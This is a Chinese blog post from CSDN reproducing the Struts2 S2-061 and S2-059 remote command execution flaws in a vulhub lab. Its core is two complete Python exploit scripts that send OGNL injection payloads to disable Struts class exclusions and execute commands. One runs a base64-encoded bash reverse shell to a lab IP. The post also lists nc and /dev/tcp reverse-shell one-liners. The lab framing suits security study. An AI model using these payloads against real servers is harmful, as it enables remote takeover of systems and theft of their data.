命令执行漏洞【2】vulhub远程命令执行漏洞复现

已于 2024-04-26 09:30:35 修改
阅读量332 收藏 2
点赞数 8
文章标签: 安全
于 2024-04-26 09:25:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LfanBQX/article/details/138158211
版权

1.vulhub安装启动靶场环境

(1)s2-061开启靶场




(2)s2-059开启靶场


2.漏洞复现

(1)s2-061漏洞复现
github获取漏洞利用工具

开始利用

(2)s2-059漏洞复现



在linux特有临时目录/tmp下创建空文件,由于通常该目录中不会存在该名称的文件,所以可以作为命令执行的验证命令.

可看到在/tmp/路径下,已成功创建的success文件,说明漏洞利用成功

利用POC如下:

import requests

url = "http://10.1.1.101:8080"
data1 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
}
data2 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('touch /tmp/success'))}"
}
res1 = requests.post(url, data=data1)
# print(res1.text)
res2 = requests.post(url, data=data2)
# print(res2.text)

3.反弹shell

控制端   nc -lvvp 6666
被控制端   nc 10.1.1.101 6666 -e /bin/bash
                 bash -i >& /dev/tcp/10.1.1.101/6666 0>&1           (被控制端未装nc,就可以使用bash(linux都能连接))

https://www.cnblogs.com/lingzhisec/p/13917529.html
受害端执行反弹shell命令


控制端进行监听

执行反弹shell的POC如下:

import requests
url = "http://10.1.1.101:8080"
data1 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
}
data2 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xLjEuMTAwLzY2NjYgMD4mMQo=}|{base64,-d}|{bash,-i}'))}"
}
res1 = requests.post(url, data=data1)
res2 = requests.post(url, data=data2)
LfanBQX
关注
  • 8
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
[ vulhub漏洞复现 ] Django SQL注入漏洞复现 CVE-2021-35042
qq_51577576的博客
09-28 2523
[ vulhub漏洞复现 ] Django SQL注入漏洞复现 CVE-2021-35042 Django 组件存在 SQL 注入漏洞,该漏洞是由于对 QuerySet.order_by()中用户提供数据的过滤不足,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行 SQL 注入攻击,最终造成服务器敏感信息泄露。
[ vulhub漏洞复现 ] ActiveMQ反序列化漏洞复现(CVE-2015-5254)
qq_51577576的博客
08-14 2817
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。......
[ vulhub漏洞复现 ] vulhub 漏洞集合(含漏洞复现文章连接)
小司机的奥拓
04-23 1564
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅我也会不定期再中间更新复现文章链接目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者。
vulhub漏洞复现
qq_30854761的博客
04-26 4086
下载镜像 1 docker pull medicean/vulapps:s_shiro_1 直接运行镜像,将docker的8080端口映射到本地的 8080上 1 docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1 获取复现需要用到的ysoserial工具 若无mvn则自行下载安装 1 2 3 git clone..
Web安全技术期末考查-vulhub靶场搭建及漏洞复现
最新发布
weixin_52363821的博客
05-27 2281
vulhub靶场搭建及漏洞复现。搭建弱点环境,详细的漏洞验证过程,修复、防御方法。
Kali 搭建Vulhub靶场 (详细)
qq_43508668的博客
04-21 1486
这里写目录标题安装Docker安装pip安装docker-compose下载Vulhub 安装Docker 检查软件更新 apt-get update 安装https协议、CA证书 apt-get install -y apt-transport-https ca-certificates 安装docker apt install docker.io docker -v 查看是否安装成功 启动docker systemctl start docker 显示docker信息 docker ps -
Go代码审计:Gitea远程命令执行漏洞
02-24
这是本漏洞链的导火索,其出现在GitLFS的处理逻辑中。GitLFS是Git为大文件设置的存储容器,我们可以理解为,他将真正的文件存储在git仓库外,而git仓库中只存储了这个文件的索引(一个哈希值)。这样,gitobjects和....
vulhub-spring漏洞复现
qq_51922767的博客
09-14 2558
vulhub-spring漏洞复现
vulhub漏洞复现1
xhscxj的博客
05-23 1920
CVE-2018-18778 CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 影响版本:ACME mini_httpd before 1.30 分析 当mini_httpd开启虚拟主机时,此
vulhub漏洞复现-Nginx
遇事不决冲冲冲
10-28 4892
Nginx nginx是一个高性能的HTTP和反向代理web服务器。 思路 在关闭了pathinfo的情况下,只有.php后缀的文件才会被发送给fastcgi解析。 而存在CVE-2013-4547的情况下,我们请求1.gif[0x20][0x00].php,这个URI可以匹配上正则\.php$,可以进入这个Location块;但进入后,Nginx却错误地认为请求的文件是1.gif[0x20],就设置其为SCRIPT_FILENAME的值发送给fastcgi,而Fastcgi根据SCRIPT_FILENAM
Vulhub靶场之Tomcat漏洞复现
weixin_66717977的博客
06-30 424
tomcat漏洞复现
vulhub漏洞复现66_Spring
weixin_44193247的博客
02-13 1027
vulhub漏洞复现练习
vulhub漏洞复现78_Weblogic
weixin_44193247的博客
02-15 1906
vulhub漏洞复现练习
vulhub漏洞复现之bash(Shellshock CVE-2014-6271)复现
qq_45300786的博客
04-16 378
https://blog.csdn.net/weixin_43071873/article/details/110233234 https://www.cnblogs.com/tr1ple/p/11203366.html
Weblogic系列漏洞复现——vulhub
qq_45612828的博客
08-08 1963
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271) Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271) Weblogic 任意文件上传漏洞(CVE-2018-2894) Weblogic Pre-Auth 远程命令执行(CVE-2020-14882、CVE-2020-14883) Weblogic ssrf(CVE-2014-4210)......
smartbi 远程命令执行漏洞
02-02
SmartBI是一种企业级的商业智能系统软件,用于数据分析和报告生成。近期,SmartBI被发现存在远程命令执行漏洞。 该漏洞的存在使得攻击者可以通过构造恶意的命令,并通过远程访问的方式执行这些命令,从而获取系统权限并进行未授权操作。这可能导致许多安全风险,包括未经授权的数据访问、敏感信息泄漏、系统瘫痪等。 远程命令执行漏洞通常是由于软件代码中的缺陷或不安全配置导致的。在SmartBI的情况下,攻击者可以通过用户输入参数中的特殊字符来注入恶意命令,由于软件没有对这些输入进行充分的验证和过滤,导致了漏洞的存在。 为了防止此类漏洞的利用,SmartBI的开发者应该加强对用户输入的验证与过滤。验证用户输入的合法性,确保输入中不包含任何潜在的恶意命令,如特殊字符、命令标识符等。此外,软件应该限制命令执行的权限,只允许执行必要的操作,并保证执行环境的安全性。 对于用户来说,应该及时更新SmartBI软件到最新版本,以获取安全补丁和修复。此外,用户在使用SmartBI时应保持警惕,避免点击不明链接、下载可疑附件,以及及时报告任何异常情况。 总之,SmartBI远程命令执行漏洞的存在给企业数据安全带来了潜在威胁。开发者需要加强软件的安全性设计和防护措施,而用户则应该保持警惕并采取合适的安全措施来最大程度地降低风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值